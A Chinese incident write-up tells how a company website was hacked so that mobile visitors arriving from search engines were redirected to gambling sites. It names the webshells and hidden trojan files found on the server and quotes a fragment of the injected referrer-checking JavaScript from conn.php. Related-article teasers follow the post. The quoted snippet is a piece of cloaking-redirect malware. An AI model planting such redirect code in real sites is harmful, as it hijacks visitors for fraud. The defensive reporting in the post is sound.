访问站点只要后面目录带apk(不管是文件还是目录),就会判断请求头,如果为手机移动端的请求头,就会跳转到博彩网站,如果是电脑PC浏览器,就会弹空白页访问站点,让你看不到跳转后的网址,只要域名后面地址带apk(不管是文件还是目录),就会判断请求头,如果为手机移动端的请求头,就会跳转bc网站,如果是电脑浏览器,就会弹空白页,最近也加上客户订单越来越少,领导也是着急,很大一部分客户渠道来源都从百度点击来的,静下心来看看网站到底是怎么回事,不看不要紧,简直吓我一跳。网站在百度里的收录增加许多,本来以为是更新的文章导致的,可是仔细一想也没那么多的收录呀,site:网站,点击到十页以后竟然发现了问题的关键,百度收录了一大堆我们网站没有的URL链接,复制那个我们域名的链接,提示不存在,从百度收录点进去跳转到BC网站。

排查过程

最初判断可能是修改了js文件,但经过长时间的浏览,文件内容搜索等等该用上的技能都用上了,头皮都发麻了,翻了2个小时,都没有发现js修改的一点痕迹,而且发现这个服务器的所有站点都有这个问题,看起来事情并不简单,现在的当务之急是尽快解决这个问题,否则影响太大。通过服务器的SINESAFE木马查杀工具,查杀出多个变形的webshell,以及隐藏属性无法删除的木马文件,本地扫描两个上传文件,火绒均报毒。

我这才明白过来,原来是我网站被黑了。赶紧打开服务器里的各个站点,下载网站程序代码到本地,然后挨个对每一个代码进行查看,查看是不是网站被黑客植入了木马后门,果不其然在每个网站根目录里的conn.php发现了黑客插入的恶意代码:

functiongo_bots_url(){varinit_flag="apk",bct=document.referrer,bot=['baidu','google','yahoo','bing','soso','sogou','360.cn','so.com','youdao','anquan','sm.cn'];//,'haosou'];for(variinbot){if(bct.indexOf(bot[i])!=-1){init_flag="apk";

去除掉恶意代码后,网站从百度搜索点击进来的也正常显示了,真是太无耻了,在服务器中查看隐藏属性的文件普通肉眼是看不到的,需要用专门的SINESAFE木马查杀工具才能看到,怪不得我找了大半天都没找到问题根源。接下来的工作就是抓紧修复网站漏洞,以及对服务器上的所有站点进行排查和漏洞修复,防止被再次攻击跳转,如果大家对程序代码不太熟悉无法修复漏洞的话可以到网站安全公司去看看。

网站被黑总被跳转到其他网站的处理解决过程相关推荐

  1. 网站被中木马并跳转到恶意网站的查杀过程

    症状: 访问站点只要后面目录带apk(不管是文件还是目录),就会判断请求头,如果为手机移动端的请求头,就会跳转到恶意网站,如果是电脑PC浏览器,就会弹空白页访问站点,让你看不到跳转后的网址,最近也加上 ...

  2. 网站域名被劫持、网站dns被劫持 域名跳转到别的网站的解决方法

    网站域名被劫持,网站dns被劫持,域名跳转到别的网站怎么解决? 网站域名被劫持,网站dns被劫持,域名跳转到别的网站怎么解决? 出现网站域名跳转到其他网站,这一现象很可能是域名被劫持. [网站域名被劫 ...

  3. **官网被黑、网站被黑后和网站被入侵更好的处理解决办法

    2018.6.19当天接到一位新客户反映自己的网站被黑了,网站首页也被黑客篡改了,网站首页被加了一些与网站不相符的内容与加密的代码,导致百度网址安全中心提醒您:该页面可能存在木马病毒!网站在百度的收录 ...

  4. **网站被黑后和官网被入侵更好的处理解决办法

    2011年11月11日,Valve Software总裁加布·纽维尔bai向Steam的用户发du送了一篇通知,承认黑客大zhi规模攻击了daoSteam论坛,而且受zhuan到攻击的论坛数据库中,包 ...

  5. 百度流量异常投诉方法、网站被黑了处理方案、网站被镜像处理方案

    <百度流量异常投诉方法> 我们来看看投诉秘籍,当然前提是您网站内容价值高,您没有排上来是百度的损失,比如插入在你结果前面的页面都不如你,甚至很垃圾,比如用户搜你网站名的时候你却排不上来等. ...

  6. 网站被黑你隔了多久才知道?

    为什么网站优化过后总是被花样"黑"?今天删了明天挂,究竟是自己的网站中了什么毒?到底该怎样才能发现自己的网站被黑了呢? 1.搜索引擎提醒"网站危险" 一般来说, ...

  7. 网站自动识别手机访问跳转至手机网站

    如何让用户输入wap手机网站的网址时自动跳转到wap网站 ? wap页面自动跳转的实现方式 ? 如何判断访客是否是移动设备访问,自动跳转到wap页面 ? 手机自动跳转到手机页面,一个网址区分普通访问与 ...

  8. 网站被黑,通过百度/搜狗等搜索关键词访问跳转到其他网站怎么办?

    事情的经过是这样的,五一劳动节放个小长假,鹏仔想休息休息,懒得开电脑,一般小长假就不更新文章,连网站都不怎么访问,在5月3号,看到自己的技术群有人在问前端某知识点,刚好自己个人博客整理了,就百度搜索& ...

  9. 网站被黑挂黑链跳转处理 网站被攻击解决方法

    一.网站被黑,即黑客通过主机及程序漏洞掌握了网站修改权.网站被黑的形式有以下几种,请自检. 1.网站标题title被修改 2.网站被挂黑链(页面中看不见,需要检查源代码是否有大师第三方网址) 3.网站 ...

  10. 网站被黑了被挂马篡改后,如何解决网站被挂马?

    文章目录 网站被黑了.被挂马.被篡改后,自己如何解决网站被挂马? 示例: 方法一 一. 发现被黑,网站被黑的症状 二.自己猜想了一下原因,页面和百度抓取收录显示不一致.查服务器日志方案不可行. 三.找 ...

最新文章

  1. atitit.mp4 视频文件多媒体格式结构详解
  2. 第三讲:WCF介绍(3)
  3. sql盲注特点_SQL注入介绍及分类解读
  4. NYOJ 6 喷水装置(一) 贪心算法 之 区间覆盖问题
  5. JpaSpecificationExecutor
  6. 什么是SAP Spartacus schematics
  7. 中国还有一个作家叫格非
  8. 期刊投稿状态_SCI投稿全过程解析及拒稿后处理对策
  9. linux线程引起jvm崩溃,JVM宕机分析
  10. jQuery 实现表格与 ckeckbox 的全选、单选功能
  11. @程序员 腾讯云计算机视觉应用干货,不容错过!
  12. df 命令查看磁盘空间_Linux df命令检查磁盘空间
  13. MySQL 死锁专题问题处理
  14. Cesium:加载本地高程/地形数据
  15. 响应式精美列表商城卡密自动发卡源码
  16. 基础版专业版全屏海报图片轮播代码生成器(淘宝店铺特效装修工具软件)
  17. CodeBlock 基本使用
  18. R语言︱线性混合模型理论与案例探究(固定效应随机效应)
  19. 成都一名程序员跳楼,程序员眼中的成都和天府软件园
  20. 摄氏度和华氏度的换算

热门文章

  1. 软件工程师应该如何吵架?
  2. js 打印去掉页眉页脚页码_JS实现无页眉页脚打印(转)
  3. typora导出pdf文件缺失
  4. 下列不是SQL的服务器组件,北语网院15秋《数据库应用(SQL server)》作业3答案...
  5. 首批企业入驻“一县一店”:多元化方式助力农产外销
  6. oracle dbms_lob trim,ORACLE LOB处理
  7. 数字序号转为字母序号
  8. 【vbers】ibv_reg_mr|RDMA
  9. 怀旧小虎队 谨防挂马网站和极虎病毒
  10. shel ---条件、循环